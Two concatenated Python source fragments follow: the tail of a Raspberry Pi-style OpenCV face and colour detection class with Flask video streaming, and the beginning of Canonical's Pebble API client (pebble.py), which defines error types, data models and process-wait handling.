"""Video streaming route. Put this in the src attribute of an img tag."""
return Response(gen(),
mimetype='multipart/x-mixed-replace; boundary=frame')
def web_camera_start():
app.run(host='0.0.0.0', port=9000,threaded=True)
class Vilib(object):
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
kernel_5 = np.ones((5,5),np.uint8)#4x4的卷积核
# color_default = 'blue'
# color_dict = {'red':[0,4],'orange':[5,18],'yellow':[22,37],'green':[42,85],'blue':[92,110],'purple':[115,165],'red_2':[166,180]}
# lower_color = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
# upper_color = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
# hdf_flag = False
# cdf_flag = False
# stf_flag = False
video_source = 0
# human_object_counter = 0
# detect_obj_parameter = np.array([0,0])
# human_object_size = np.array([0,0])
# color_object_counter = 0
detect_obj_parameter = Manager().dict()
img_array = Manager().list(range(2))
#Color_obj_parameter
detect_obj_parameter['color_default'] = 'red'
color_dict = {'red':[0,4],'orange':[5,18],'yellow':[22,37],'green':[42,85],'blue':[92,110],'purple':[115,165],'red_2':[166,180]}
# lower_color = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
# upper_color = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
detect_obj_parameter['color_x'] = 160
detect_obj_parameter['color_y'] = 120
detect_obj_parameter['color_w'] = 0
detect_obj_parameter['color_h'] = 0
detect_obj_parameter['color_n'] = 0
detect_obj_parameter['lower_color'] = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
detect_obj_parameter['upper_color'] = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
#Human_obj_parameter
detect_obj_parameter['human_x'] = 160
detect_obj_parameter['human_y'] = 120
detect_obj_parameter['human_w'] = 0
detect_obj_parameter['human_h'] = 0
detect_obj_parameter['human_n'] = 0
#detect_switch
detect_obj_parameter['hdf_flag'] = False
detect_obj_parameter['cdf_flag'] = False
# detect_obj_parameter['color_default'] = 'red'
# color_dict = {'red':[0,4],'orange':[5,18],'yellow':[22,37],'green':[42,85],'blue':[92,110],'purple':[115,165],'red_2':[166,180]}
# lower_color = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
# upper_color = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
rt_img = np.ones((320,240),np.uint8)
front_view_img = np.zeros((240,320,3), np.uint8)
# 使用白色填充图片区域,默认为黑色
# front_view_img.fill(255)
img_array[0] = rt_img
# img_array = rt_img
vi_img = np.ones((320,240),np.uint8)
@staticmethod
def color_detect_object(obj_parameter):
if obj_parameter == 'x':
# print(Vilib.detect_obj_parameter['x'])
return int(Vilib.detect_obj_parameter['color_x']/107.0)-1
elif obj_parameter == 'y':
# print(Vilib.detect_obj_parameter['y'])
return -1*(int(Vilib.detect_obj_parameter['color_y']/80.1)-1) #max_size_object_coordinate_y
elif obj_parameter == 'width':
return Vilib.detect_obj_parameter['color_w'] #objects_max_width
elif obj_parameter == 'height':
return Vilib.detect_obj_parameter['color_h'] #objects_max_height
elif obj_parameter == 'number':
return Vilib.detect_obj_parameter['color_n'] #objects_count
return None
@staticmethod
def human_detect_object(obj_parameter):
if obj_parameter == 'x':
# print(Vilib.detect_obj_parameter['x'])
return int(Vilib.detect_obj_parameter['human_x']/107.0)-1
elif obj_parameter == 'y':
# print(Vilib.detect_obj_parameter['y'])
return -1*(int(Vilib.detect_obj_parameter['human_y']/80.1)-1) #max_size_object_coordinate_y
elif obj_parameter == 'width':
return Vilib.detect_obj_parameter['human_w'] #objects_max_width
elif obj_parameter == 'height':
return Vilib.detect_obj_parameter['human_h'] #objects_max_height
elif obj_parameter == 'number':
return Vilib.detect_obj_parameter['human_n'] #objects_count
return None
@staticmethod
def detect_color_name(color_name):
Vilib.detect_obj_parameter['color_default'] = color_name
Vilib.detect_obj_parameter['lower_color'] = np.array([min(Vilib.color_dict[Vilib.detect_obj_parameter['color_default']]), 60, 60])
Vilib.detect_obj_parameter['upper_color'] = np.array([max(Vilib.color_dict[Vilib.detect_obj_parameter['color_default']]), 255, 255])
@staticmethod
def camera_start(web_func = True):
from multiprocessing import Process
# Vilib.conn1, Vilib.conn2 = Pipe()
# Vilib.q = Queue()
worker_2 = Process(name='worker 2',target=Vilib.camera_clone)
if web_func == True:
worker_1 = Process(name='worker 1',target=web_camera_start)
worker_1.start()
worker_2.start()
# if web_func == True:
# print("1")
# # from flask_camera import web_camera_start
# t2 = threading.Thread(target=web_camera_start) #Thread是一个类,实例化产生t1对象,这里就是创建了一个线程对象t1
# print("2")
# t2.start() #线程执行
# print('cam')
# t1 = threading.Thread(target=Vilib.camera_clone) #Thread是一个类,实例化产生t1对象,这里就是创建了一个线程对象t1
# t1.start() #线程执行
# print('yes')
@staticmethod
def human_detect_switch(flag=False):
Vilib.detect_obj_parameter['hdf_flag'] = flag
@staticmethod
def color_detect_switch(flag=False):
Vilib.detect_obj_parameter['cdf_flag'] = flag
@staticmethod
def camera_clone():
Vilib.camera()
@staticmethod
def camera():
# from PIL import Image
# rm = RGB_Matrix(0X74) #RGB
# k_img = []
camera = cv2.VideoCapture(Vilib.video_source)
camera.set(3,320)
camera.set(4,240)
width = int(camera.get(3))
height = int(camera.get(4))
M = cv2.getRotationMatrix2D((width / 2, height / 2), 180, 1)
camera.set(cv2.CAP_PROP_BUFFERSIZE,1)
cv2.setUseOptimized(True)
# pj_img = cv2.imread("javars.png")
# pj_img = cv2.resize(pj_img, (320, 240), interpolation=cv2.INTER_LINEAR)
# print(Vilib.front_view_img.shape)
front_view_coor_1 = ()
front_view_coor_2 = ()
while True:
_, img = camera.read()
# img = cv2.warpAffine(img, M, (320, 240))
Vilib.front_view_img =img.copy()
# img = cv2.resize(img, (8,8), interpolation=cv2.INTER_LINEAR)
img = Vilib.human_detect_func(img)
img = Vilib.color_detect_func(img)
# print(Vilib.color_detect_func(img).shape)
front_view_coor_1 = (Vilib.detect_obj_parameter['color_x'], Vilib.detect_obj_parameter['color_y'])
front_view_coor_2 = (Vilib.detect_obj_parameter['color_x']+40, Vilib.detect_obj_parameter['color_y']+40)
cv2.rectangle(Vilib.front_view_img, front_view_coor_1, front_view_coor_2, (255, 144, 30), -1)
cv2.rectangle(Vilib.front_view_img, (0,0), (320,20), (46,139,87), -1)
cv2.putText(Vilib.front_view_img,"temp: "+str(cpu_temperature()),(0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,(0,0,255),1,cv2.LINE_AA)
cv2.putText(Vilib.front_view_img,'hello world!',(160,160), cv2.FONT_HERSHEY_SIMPLEX, 1.5,(255,255,255),2, cv2.LINE_AA)
# cv2.line(Vilib.front_view_img, (Vilib.detect_obj_parameter['color_x'], Vilib.detect_obj_parameter['color_y']), (120, 200), (255, 144, 30), 5)
Vilib.img_array[0] = cv2.addWeighted(img, 0.5, Vilib.front_view_img, 0.5, 0)
# cv2.rectangle(Vilib.front_view_img, (0, 0), (320, 240), (255, 144, 30), 40)
# k_img = list(Image.fromarray(cv2.cvtColor(Vilib.img_array[0],cv2.COLOR_BGR2RGB)).getdata())#opencv转PIL
# rm.image(k_img)
# Vilib.img_array[0] = cv2.addWeighted(Vilib.color_detect_func(img), 0.9, pj_img, 0.1, 0)
# if w == True:
# q.send(Vilib.vi_img)
@staticmethod
def human_detect_func(img):
if Vilib.detect_obj_parameter['hdf_flag'] == True:
resize_img = cv2.resize(img, (160,120), interpolation=cv2.INTER_LINEAR) # 2.从BGR转换到RAY
gray = cv2.cvtColor(resize_img, cv2.COLOR_BGR2GRAY)
faces = Vilib.face_cascade.detectMultiScale(gray, 1.3, 2)
# print(len(faces))
Vilib.detect_obj_parameter['human_n'] = len(faces)
max_area = 0
if Vilib.detect_obj_parameter['human_n'] > 0:
for (x,y,w,h) in faces:
x = x*2
y = y*2
w = w*2
h = h*2
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
object_area = w*h
if object_area > max_area:
object_area = max_area
Vilib.detect_obj_parameter['human_x'] = int(x + w/2)
Vilib.detect_obj_parameter['human_y'] = int(y + h/2)
Vilib.detect_obj_parameter['human_w'] = w
Vilib.detect_obj_parameter['human_h'] = h
else:
Vilib.detect_obj_parameter['human_x'] = 160
Vilib.detect_obj_parameter['human_y'] = 120
Vilib.detect_obj_parameter['human_w'] = 0
Vilib.detect_obj_parameter['human_h'] = 0
Vilib.detect_obj_parameter['human_n'] = 0
return img
else:
return img
@staticmethod
def color_detect_func(img):
# 蓝色的范围,不同光照条件下不一样,可灵活调整 H:色度,S:饱和度 v:明度
if Vilib.detect_obj_parameter['cdf_flag'] == True:
resize_img = cv2.resize(img, (160,120), interpolation=cv2.INTER_LINEAR)
hsv = cv2.cvtColor(resize_img, cv2.COLOR_BGR2HSV) # 2.从BGR转换到HSV
# print(Vilib.lower_color)
mask = cv2.inRange(hsv, Vilib.detect_obj_parameter['lower_color'], Vilib.detect_obj_parameter['upper_color']) # 3.inRange():介于lower/upper之间的为白色,其余黑色
if Vilib.detect_obj_parameter['color_default'] == 'red':
mask_2 = cv2.inRange(hsv, (175,50,20), (180,255,255))
mask = cv2.bitwise_or(mask, mask_2)
open_img = cv2.morphologyEx(mask, cv2.MORPH_OPEN,Vilib.kernel_5,iterations=1) #开运算
contours, hierarchy = cv2.findContours(open_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) ####在binary中发现轮廓,轮廓按照面积从小到大排列
# p=0
Vilib.detect_obj_parameter['color_n'] = len(contours)
max_area = 0
if Vilib.detect_obj_parameter['color_n'] > 0:
for i in contours: #遍历所有的轮廓
x,y,w,h = cv2.boundingRect(i) #将轮廓分解为识别对象的左上角坐标和宽、高
#在图像上画上矩形(图片、左上角坐标、右下角坐标、颜色、线条宽度)
if w > 8 and h > 8:
x = x*2
y = y*2
w = w*2
h = h*2
cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
#给识别对象写上标号
cv2.putText(img,Vilib.detect_obj_parameter['color_default'],(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)#加减10是调整字符位置
object_area = w*h
if object_area > max_area:
object_area = max_area
Vilib.detect_obj_parameter['color_x'] = int(x + w/2)
Vilib.detect_obj_parameter['color_y'] = int(y + h/2)
Vilib.detect_obj_parameter['color_w'] = w
Vilib.detect_obj_parameter['color_h'] = h
# print()
else:
Vilib.detect_obj_parameter['color_x'] = 160
Vilib.detect_obj_parameter['color_y'] = 120
Vilib.detect_obj_parameter['color_w'] = 0
Vilib.detect_obj_parameter['color_h'] = 0
Vilib.detect_obj_parameter['color_n'] = 0
return img
else:
return img
|
pebble.py
|
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for the Pebble API (HTTP over Unix socket).
For a command-line interface for local testing, see test/pebble_cli.py.
"""
import binascii
import cgi
import datetime
import email.parser
import enum
import http.client
import io
import json
import logging
import os
import re
import select
import shutil
import signal
import socket
import sys
import threading
import time
import types
import typing
import urllib.error
import urllib.parse
import urllib.request
import warnings
from ops._private import yaml
from ops._vendor import websocket
logger = logging.getLogger(__name__)
_not_provided = object()
class _UnixSocketConnection(http.client.HTTPConnection):
"""Implementation of HTTPConnection that connects to a named Unix socket."""
def __init__(self, host, timeout=_not_provided, socket_path=None):
if timeout is _not_provided:
super().__init__(host)
else:
super().__init__(host, timeout=timeout)
self.socket_path = socket_path
def connect(self):
"""Override connect to use Unix socket (instead of TCP socket)."""
if not hasattr(socket, 'AF_UNIX'):
raise NotImplementedError('Unix sockets not supported on {}'.format(sys.platform))
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.socket_path)
if self.timeout is not _not_provided:
self.sock.settimeout(self.timeout)
class _UnixSocketHandler(urllib.request.AbstractHTTPHandler):
"""Implementation of HTTPHandler that uses a named Unix socket."""
def __init__(self, socket_path):
super().__init__()
self.socket_path = socket_path
def http_open(self, req):
"""Override http_open to use a Unix socket connection (instead of TCP)."""
return self.do_open(_UnixSocketConnection, req, socket_path=self.socket_path)
# Matches yyyy-mm-ddTHH:MM:SS(.sss)ZZZ
_TIMESTAMP_RE = re.compile(
r'(\d{4})-(\d{2})-(\d{2})[Tt](\d{2}):(\d{2}):(\d{2})(\.\d+)?(.*)')
# Matches [-+]HH:MM
_TIMEOFFSET_RE = re.compile(r'([-+])(\d{2}):(\d{2})')
def _parse_timestamp(s):
"""Parse timestamp from Go-encoded JSON.
This parses RFC3339 timestamps (which are a subset of ISO8601 timestamps)
that Go's encoding/json package produces for time.Time values.
Unfortunately we can't use datetime.fromisoformat(), as that does not
support more than 6 digits for the fractional second, nor the 'Z' for UTC.
Also, it was only introduced in Python 3.7.
"""
match = _TIMESTAMP_RE.match(s)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
y, m, d, hh, mm, ss, sfrac, zone = match.groups()
if zone in ('Z', 'z'):
tz = datetime.timezone.utc
else:
match = _TIMEOFFSET_RE.match(zone)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
sign, zh, zm = match.groups()
tz_delta = datetime.timedelta(hours=int(zh), minutes=int(zm))
tz = datetime.timezone(tz_delta if sign == '+' else -tz_delta)
microsecond = round(float(sfrac or '0') * 1000000)
return datetime.datetime(int(y), int(m), int(d), int(hh), int(mm), int(ss),
microsecond=microsecond, tzinfo=tz)
def _format_timeout(timeout: float):
"""Format timeout for use in the Pebble API.
The format is in seconds with a millisecond resolution and an 's' suffix,
as accepted by the Pebble API (which uses Go's time.ParseDuration).
"""
return '{:.3f}s'.format(timeout)
def _json_loads(s: typing.Union[str, bytes]) -> typing.Dict:
"""Like json.loads(), but handle str or bytes.
This is needed because an HTTP response's read() method returns bytes on
Python 3.5, and json.load doesn't handle bytes.
"""
if isinstance(s, bytes):
s = s.decode('utf-8')
return json.loads(s)
def _start_thread(target, *args, **kwargs) -> threading.Thread:
"""Helper to simplify starting a thread."""
thread = threading.Thread(target=target, args=args, kwargs=kwargs)
thread.start()
return thread
class Error(Exception):
"""Base class of most errors raised by the Pebble client."""
def __repr__(self):
return '<{}.{} {}>'.format(type(self).__module__, type(self).__name__, self.args)
def name(self):
"""Return a string representation of the model plus class."""
return '<{}.{}>'.format(type(self).__module__, type(self).__name__)
def message(self):
"""Return the message passed as an argument."""
return self.args[0]
class TimeoutError(TimeoutError, Error):
"""Raised when a polling timeout occurs."""
class ConnectionError(Error):
"""Raised when the Pebble client can't connect to the socket."""
class ProtocolError(Error):
"""Raised when there's a higher-level protocol error talking to Pebble."""
class PathError(Error):
"""Raised when there's an error with a specific path."""
def __init__(self, kind: str, message: str):
"""This shouldn't be instantiated directly."""
self.kind = kind
self.message = message
def __str__(self):
return '{} - {}'.format(self.kind, self.message)
def __repr__(self):
return 'PathError({!r}, {!r})'.format(self.kind, self.message)
class APIError(Error):
"""Raised when an HTTP API error occurs talking to the Pebble server."""
def __init__(self, body: typing.Dict, code: int, status: str, message: str):
"""This shouldn't be instantiated directly."""
super().__init__(message) # Makes str(e) return message
self.body = body
self.code = code
self.status = status
self.message = message
def __repr__(self):
return 'APIError({!r}, {!r}, {!r}, {!r})'.format(
self.body, self.code, self.status, self.message)
class ChangeError(Error):
"""Raised by actions when a change is ready but has an error.
For example, this happens when you attempt to start an already-started
service:
cannot perform the following tasks:
- Start service "test" (service "test" was previously started)
"""
def __init__(self, err: str, change: 'Change'):
"""This shouldn't be instantiated directly."""
self.err = err
self.change = change
def __str__(self):
parts = [self.err]
# Append any task logs to the error message
for i, task in enumerate(self.change.tasks):
if not task.log:
continue
parts.append('\n----- Logs from task {} -----\n'.format(i))
parts.append('\n'.join(task.log))
if len(parts) > 1:
parts.append('\n-----')
return ''.join(parts)
def __repr__(self):
return 'ChangeError({!r}, {!r})'.format(self.err, self.change)
class ExecError(Error):
"""Raised when a :meth:`Client.exec` command returns a non-zero exit code.
Attributes:
command: Command line of command being executed.
exit_code: The process's exit code. This will always be non-zero.
stdout: If :meth:`ExecProcess.wait_output` was being called, this is
the captured stdout as a str (or bytes if encoding was None). If
:meth:`ExecProcess.wait` was being called, this is None.
stderr: If :meth:`ExecProcess.wait_output` was being called and
combine_stderr was False, this is the captured stderr as a str (or
bytes if encoding was None). If :meth:`ExecProcess.wait` was being
called or combine_stderr was True, this is None.
"""
STR_MAX_OUTPUT = 1024
def __init__(
self,
command: typing.List[str],
exit_code: int,
stdout: typing.Optional[typing.AnyStr],
stderr: typing.Optional[typing.AnyStr],
):
self.command = command
self.exit_code = exit_code
self.stdout = stdout
self.stderr = stderr
def __str__(self):
message = 'non-zero exit code {} executing {!r}'.format(
self.exit_code, self.command)
for name, out in [('stdout', self.stdout), ('stderr', self.stderr)]:
if out is None:
continue
truncated = ' [truncated]' if len(out) > self.STR_MAX_OUTPUT else ''
out = out[:self.STR_MAX_OUTPUT]
message = '{}, {}={!r}{}'.format(message, name, out, truncated)
return message
class WarningState(enum.Enum):
"""Enum of states for get_warnings() select parameter."""
ALL = 'all'
PENDING = 'pending'
class ChangeState(enum.Enum):
"""Enum of states for get_changes() select parameter."""
ALL = 'all'
IN_PROGRESS = 'in-progress'
READY = 'ready'
class SystemInfo:
"""System information object."""
def __init__(self, version: str):
self.version = version
@classmethod
def from_dict(cls, d: typing.Dict) -> 'SystemInfo':
"""Create new SystemInfo object from dict parsed from JSON."""
return cls(version=d['version'])
def __repr__(self):
return 'SystemInfo(version={self.version!r})'.format(self=self)
class Warning:
"""Warning object."""
def __init__(
self,
message: str,
first_added: datetime.datetime,
last_added: datetime.datetime,
last_shown: typing.Optional[datetime.datetime],
expire_after: str,
repeat_after: str,
):
self.message = message
self.first_added = first_added
self.last_added = last_added
self.last_shown = last_shown
self.expire_after = expire_after
self.repeat_after = repeat_after
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Warning':
"""Create new Warning object from dict parsed from JSON."""
return cls(
message=d['message'],
first_added=_parse_timestamp(d['first-added']),
last_added=_parse_timestamp(d['last-added']),
last_shown=_parse_timestamp(d['last-shown']) if d.get('last-shown') else None,
expire_after=d['expire-after'],
repeat_after=d['repeat-after'],
)
def __repr__(self):
return ('Warning('
'message={self.message!r}, '
'first_added={self.first_added!r}, '
'last_added={self.last_added!r}, '
'last_shown={self.last_shown!r}, '
'expire_after={self.expire_after!r}, '
'repeat_after={self.repeat_after!r})'
).format(self=self)
class TaskProgress:
"""Task progress object."""
def __init__(
self,
label: str,
done: int,
total: int,
):
self.label = label
self.done = done
self.total = total
@classmethod
def from_dict(cls, d: typing.Dict) -> 'TaskProgress':
"""Create new TaskProgress object from dict parsed from JSON."""
return cls(
label=d['label'],
done=d['done'],
total=d['total'],
)
def __repr__(self):
return ('TaskProgress('
'label={self.label!r}, '
'done={self.done!r}, '
'total={self.total!r})'
).format(self=self)
class TaskID(str):
"""Task ID (a more strongly-typed string)."""
def __repr__(self):
return 'TaskID({!r})'.format(str(self))
class Task:
"""Task object."""
def __init__(
self,
id: TaskID,
kind: str,
summary: str,
status: str,
log: typing.List[str],
progress: TaskProgress,
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.log = log
self.progress = progress
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Task':
"""Create new Task object from dict parsed from JSON."""
return cls(
id=TaskID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
log=d.get('log') or [],
progress=TaskProgress.from_dict(d['progress']),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Task('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'log={self.log!r}, '
'progress={self.progress!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class ChangeID(str):
"""Change ID (a more strongly-typed string)."""
def __repr__(self):
return 'ChangeID({!r})'.format(str(self))
class Change:
"""Change object."""
def __init__(
self,
id: ChangeID,
kind: str,
summary: str,
status: str,
tasks: typing.List[Task],
ready: bool,
err: typing.Optional[str],
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.tasks = tasks
self.ready = ready
self.err = err
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Change':
"""Create new Change object from dict parsed from JSON."""
return cls(
id=ChangeID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
tasks=[Task.from_dict(t) for t in d.get('tasks') or []],
ready=d['ready'],
err=d.get('err'),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Change('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'tasks={self.tasks!r}, '
'ready={self.ready!r}, '
'err={self.err!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class Plan:
"""Represents the effective Pebble configuration."""
def __init__(self, raw: str):
d = yaml.safe_load(raw) or {}
self._raw = raw
self._services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
@property
def services(self):
"""This plan's services mapping (maps service name to Service).
This property is currently read-only.
"""
return self._services
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this plan to its dict representation."""
as_dicts = {name: service.to_dict() for name, service in self._services.items()}
if not as_dicts:
return {}
return {
'services': as_dicts,
}
def to_yaml(self) -> str:
"""Return this plan's YAML representation."""
return yaml.safe_dump(self.to_dict())
__str__ = to_yaml
class Layer:
"""Represents a Pebble configuration layer.
The format of this is not documented, but is captured in code here:
https://github.com/canonical/pebble/blob/master/internal/plan/plan.go
Attributes:
summary: A summary of the purpose of this layer
description: A long form description of this layer
services: A mapping of name: :class:`Service` defined by this layer
"""
# This is how you do type annotations, but it is not supported by Python 3.5
# summary: str
# description: str
# services: typing.Mapping[str, 'Service']
def __init__(self, raw: typing.Union[str, typing.Dict] = None):
if isinstance(raw, str):
d = yaml.safe_load(raw) or {}
else:
d = raw or {}
self.summary = d.get('summary', '')
self.description = d.get('description', '')
self.services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
def to_yaml(self) -> str:
"""Convert this layer to its YAML representation."""
return yaml.safe_dump(self.to_dict())
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this layer to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('services', {name: service.to_dict() for name, service in self.services.items()})
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Layer({!r})'.format(self.to_dict())
__str__ = to_yaml
class Service:
"""Represents a service description in a Pebble configuration layer."""
def __init__(self, name: str, raw: typing.Dict = None):
self.name = name
raw = raw or {}
self.summary = raw.get('summary', '')
self.description = raw.get('description', '')
self.startup = raw.get('startup', '')
self.override = raw.get('override', '')
self.command = raw.get('command', '')
self.after = list(raw.get('after', []))
self.before = list(raw.get('before', []))
self.requires = list(raw.get('requires', []))
self.environment = dict(raw.get('environment', {}))
self.user = raw.get('user', '')
self.user_id = raw.get('user-id')
self.group = raw.get('group', '')
self.group_id = raw.get('group-id')
def to_dict(self) -> typing.Dict:
"""Convert this service object to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('startup', self.startup),
('override', self.override),
('command', self.command),
('after', self.after),
('before', self.before),
('requires', self.requires),
('environment', self.environment),
('user', self.user),
('user-id', self.user_id),
('group', self.group),
('group-id', self.group_id),
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Service({!r})'.format(self.to_dict())
def __eq__(self, other: typing.Union[typing.Dict, 'Service']) -> bool:
"""Compare this service description to another."""
if isinstance(other, dict):
return self.to_dict() == other
elif isinstance(other, Service):
return self.to_dict() == other.to_dict()
else:
raise ValueError(
"Cannot compare pebble.Service to {}".format(type(other))
)
class ServiceStartup(enum.Enum):
"""Enum of service startup options."""
ENABLED = 'enabled'
DISABLED = 'disabled'
class ServiceStatus(enum.Enum):
"""Enum of service statuses."""
ACTIVE = 'active'
INACTIVE = 'inactive'
ERROR = 'error'
class ServiceInfo:
"""Service status information."""
def __init__(
self,
name: str,
startup: typing.Union[ServiceStartup, str],
current: typing.Union[ServiceStatus, str],
):
self.name = name
self.startup = startup
self.current = current
def is_running(self) -> bool:
"""Return True if this service is running (in the active state)."""
return self.current == ServiceStatus.ACTIVE
@classmethod
def from_dict(cls, d: typing.Dict) -> 'ServiceInfo':
"""Create new ServiceInfo object from dict parsed from JSON."""
try:
startup = ServiceStartup(d['startup'])
except ValueError:
startup = d['startup']
try:
current = ServiceStatus(d['current'])
except ValueError:
current = d['current']
return cls(
name=d['name'],
startup=startup,
current=current,
)
def __repr__(self):
return ('ServiceInfo('
'name={self.name!r}, '
'startup={self.startup}, '
'current={self.current})'
).format(self=self)
class FileType(enum.Enum):
"""Enum of file types."""
FILE = 'file'
DIRECTORY = 'directory'
SYMLINK = 'symlink'
SOCKET = 'socket'
NAMED_PIPE = 'named-pipe'
DEVICE = 'device'
UNKNOWN = 'unknown'
class FileInfo:
"""Stat-like information about a single file or directory."""
def __init__(
self,
path: str,
name: str,
type: typing.Union['FileType', str],
size: typing.Optional[int],
permissions: int,
last_modified: datetime.datetime,
user_id: typing.Optional[int],
user: typing.Optional[str],
group_id: typing.Optional[int],
group: typing.Optional[str],
):
self.path = path
self.name = name
self.type = type
self.size = size
self.permissions = permissions
self.last_modified = last_modified
self.user_id = user_id
self.user = user
self.group_id = group_id
self.group = group
@classmethod
def from_dict(cls, d: typing.Dict) -> 'FileInfo':
"""Create new FileInfo object from dict parsed from JSON."""
try:
file_type = FileType(d['type'])
except ValueError:
file_type = d['type']
return cls(
path=d['path'],
name=d['name'],
type=file_type,
size=d.get('size'),
permissions=int(d['permissions'], 8),
last_modified=_parse_timestamp(d['last-modified']),
user_id=d.get('user-id'),
user=d.get('user'),
group_id=d.get('group-id'),
group=d.get('group'),
)
def __repr__(self):
return ('FileInfo('
'path={self.path!r}, '
'name={self.name!r}, '
'type={self.type}, '
'size={self.size}, '
'permissions=0o{self.permissions:o}, '
'last_modified={self.last_modified!r}, '
'user_id={self.user_id}, '
'user={self.user!r}, '
'group_id={self.group_id}, '
'group={self.group!r})'
).format(self=self)
class ExecProcess:
"""Represents a process started by :meth:`Client.exec`.
To avoid deadlocks, most users should use :meth:`wait_output` instead of
reading and writing the :attr:`stdin`, :attr:`stdout`, and :attr:`stderr`
attributes directly. Alternatively, users can pass stdin/stdout/stderr to
:meth:`Client.exec`.
This class should not be instantiated directly, only via
:meth:`Client.exec`.
Attributes:
stdin: If the stdin argument was not passed to :meth:`Client.exec`,
this is a writable file-like object the caller can use to stream
input to the process. It is None if stdin was passed to
:meth:`Client.exec`.
stdout: If the stdout argument was not passed to :meth:`Client.exec`,
this is a readable file-like object the caller can use to stream
output from the process. It is None if stdout was passed to
:meth:`Client.exec`.
stderr: If the stderr argument was not passed to :meth:`Client.exec`
and combine_stderr was False, this is a readable file-like object
the caller can use to stream error output from the process. It is
None if stderr was passed to :meth:`Client.exec` or combine_stderr
was True.
"""
def __init__(
self,
stdin: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stdout: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stderr: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
client: 'Client',
timeout: typing.Optional[float],
control_ws: websocket.WebSocket,
stdio_ws: websocket.WebSocket,
stderr_ws: websocket.WebSocket,
command: typing.List[str],
encoding: typing.Optional[str],
change_id: ChangeID,
cancel_stdin: typing.Callable[[], None],
cancel_reader: typing.Optional[int],
threads: typing.List[threading.Thread],
):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self._client = client
self._timeout = timeout
self._control_ws = control_ws
self._stdio_ws = stdio_ws
self._stderr_ws = stderr_ws
self._command = command
self._encoding = encoding
self._change_id = change_id
self._cancel_stdin = cancel_stdin
self._cancel_reader = cancel_reader
self._threads = threads
self._waited = False
def __del__(self):
if not self._waited:
msg = 'ExecProcess instance garbage collected without call to wait() or wait_output()'
warnings.warn(msg, ResourceWarning)
def wait(self):
"""Wait for the process to finish.
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
exit_code = self._wait()
if exit_code != 0:
raise ExecError(self._command, exit_code, None, None)
def _wait(self):
self._waited = True
timeout = self._timeout
if timeout is not None:
# A bit more than the command timeout to ensure that happens first
timeout += 1
change = self._client.wait_change(self._change_id, timeout=timeout)
# If stdin reader thread is running, stop it
if self._cancel_stdin is not None:
self._cancel_stdin()
# Wait for all threads to finish (e.g., message barrier sent)
for thread in self._threads:
thread.join()
# If we opened a cancel_reader pipe, close the read side now (write
# side was already closed by _cancel_stdin().
if self._cancel_reader is not None:
os.close(self._cancel_reader)
# Close websockets (shutdown doesn't send CLOSE message or wait for response).
self._control_ws.shutdown()
self._stdio_ws.shutdown()
